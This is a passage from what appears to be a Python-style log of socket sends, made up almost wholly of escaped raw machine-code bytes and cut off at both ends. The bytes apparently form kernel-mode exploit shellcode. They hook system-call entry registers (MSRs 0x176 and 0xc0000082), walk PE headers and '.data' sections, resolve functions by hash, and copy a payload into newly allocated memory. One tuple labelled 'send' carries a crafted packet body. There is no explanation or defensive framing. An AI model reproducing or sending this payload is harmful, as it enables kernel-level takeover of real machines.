x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 11, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 